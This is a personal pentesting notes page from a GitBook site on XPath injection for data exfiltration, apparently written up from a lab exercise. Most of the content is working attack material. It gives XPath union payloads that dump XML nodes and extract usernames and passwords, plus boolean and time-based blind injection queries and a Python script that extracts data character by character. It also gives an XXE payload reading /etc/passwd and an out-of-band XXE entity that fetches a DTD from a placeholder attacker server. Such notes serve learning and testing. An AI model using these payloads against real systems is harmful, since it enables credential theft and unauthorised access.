📖
NOTES
  • Welcome!
  • Reference
    • Hacking
      • Penetration Testing Resources Bookmarks
        • Research Links
        • Cheat Sheet
        • Learning/Training
        • Tools
        • Payloads
        • Shell
        • AI
        • Reads
        • Podcast
        • Social Engineering
      • Web/App Pentesting
        • SQL Injection
          • SQL Injection In The URL
          • SQL Injection In The Search Field
          • SQL Injection in Login forms
          • Boolean SQL Injection Blind
          • Time based SQL Injection Blind
          • Bypassing SQL Filters
          • SQL Injection with sqlmap
          • XPath Injection - Authentication Bypass
            • XPath Advanced Data Exfiltration
          • Payloads
        • XSS
          • Payloads
          • XSS Reflected
          • XSS Stored
          • Dom-based
          • Blind
        • Command Injection
          • Payloads
        • File Upload
          • Payloads
          • Bypass Filters
          • File Upload Tricks
        • SSRF
          • Payloads
        • LFI/RFI
          • Payloads
        • LDAP Injection
      • Port Swigger
        • Access control
          • Lab: Unprotected admin functionality
          • Unprotected admin functionality with unpredictable URL
          • User role controlled by request parameter
          • User ID controlled by request parameter, with unpredictable user IDs
          • User ID controlled by request parameter with password disclosure
        • Authentication
          • Username enumeration via different responses
        • Server-side request forgery (SSRF)
          • Basic SSRF against the local server
          • Basic SSRF against another back-end system
        • File Upload Vulnerabilities
          • Remote code execution via web shell upload
        • SQL Injection
          • SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
      • Burp
        • Setting up Macro for intruder
      • ☁️Cloud
        • Tools
        • AWS
          • 🪣S3 Buckets
          • Amazon IAM
          • Dockers
            • Tools
        • Azure
        • GCP
      • Networking
        • Cheat Sheet
      • Hardware Hacking
        • Computer BIOS
    • HTML/CSS/JAVA
      • Tools
      • HTTP Response Status Codes
      • Bootstrap Templates
      • SSL
      • cURL
      • Grep
    • DataBase
      • My SQL
        • Cheat Sheet
        • Tools
    • PYTHON3
      • Code Resources
      • Python Reference Guide
        • Cheat Sheet
      • Code Projects
        • Jiggler Mouse
        • loan calculator
        • Bilnd LDAP Data Exfiltration
    • SEO
      • Tools
      • On-Page SEO
      • Local SEO and Keyword Research
      • Content Optimization
      • Technical SEO
      • Off-Page SEO Tools
      • Google Ads
    • Cloud
      • AWS
        • Light Sail
          • Hosting Website on Light Sail and Namecheap
        • Boto3
      • Azure
      • GCP
    • Files
      • PDF
Powered by GitBook
On this page
  1. Reference
  2. Hacking
  3. Web/App Pentesting
  4. SQL Injection
  5. XPath Injection - Authentication Bypass

XPath Advanced Data Exfiltration

XPath Advanced Data Exfiltration Notes

1. Understanding XPath Injection

  • XPath is used to query XML data.

  • Injection occurs when user input is inserted into an XPath query without proper sanitization.

  • Common attacks include authentication bypass, data extraction, and blind XPath injection.

2. Successful Payload Analysis

  • The working payload:

    GET /index.php?q=SOMETHINGINVALID&f=fullstreetname+|+/*[1]/*[2]/*[3]/*[1]/*[3]

  • The | (union operator) allowed traversal through multiple XML nodes.

  • The nested /*[1]/*[2]/*[3]/*[1]/*[3] structure accessed deeper elements in the XML hierarchy.

3. Additional Exploration

Extract Full XML Structure

  • Try dumping all available XML elements:

    GET /index.php?q=SOMETHINGINVALID&f=| //*

  • Navigate deeper step by step:

    GET /index.php?q=SOMETHINGINVALID&f=| /*/*/*/*

Extract Multiple Fields

  • To retrieve multiple values at once:

    GET /index.php?q=SOMETHINGINVALID&f=fullstreetname | phone | email

Extract Usernames and Passwords

  • List all users:

    GET /index.php?q=SOMETHINGINVALID&f=//users/user/*

  • Extract credentials:

    GET /index.php?q=SOMETHINGINVALID&f=//users/user[1]/password

4. Blind XPath Injection

Boolean-Based Extraction

  • Check if a username starts with ‘A’:

    GET /index.php?q=SOMETHINGINVALID&f=boolean(substring(//users/user/username,1,1)='A')

Automated Character-by-Character Extraction

import requests
import string

url = "http://94.237.53.146:51113/index.php"
extracted_data = ""

for i in range(1, 50):  # Adjust based on expected length
    for char in string.ascii_letters + string.digits:
        payload = f"substring(//users/user/username,{i},1)='{char}'"
        response = requests.get(url, params={"q": "SOMETHINGINVALID", "f": payload})
        
        if "valid response" in response.text:  # Adjust based on response behavior
            extracted_data += char
            print(f"Extracted so far: {extracted_data}")
            break

print(f"Final Extracted Data: {extracted_data}")

5. Advanced Attacks

Time-Based Blind Injection

  • If there’s no direct output, force longer responses:

    GET /index.php?q=SOMETHINGINVALID&f=if(boolean(substring(//users/user/username,1,1)='A'), //*[count(//users/user/*) > 100000], //*[1])

Testing for XXE Injection

<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>

  • If the response includes file contents, the server is vulnerable.

Out-of-Band (OOB) Data Exfiltration

<!DOCTYPE foo [ <!ENTITY % remote SYSTEM "http://your-server.com/malicious.dtd"> %remote; ]>

  • If the server contacts your external URL, it confirms an OOB vulnerability.

Conclusion

  • XPath injection was successfully exploited.

  • Additional attacks were tested for further enumeration.

  • Blind extraction techniques and external entity vulnerabilities were explored.

PreviousXPath Injection - Authentication BypassNextPayloads

Last updated 3 days ago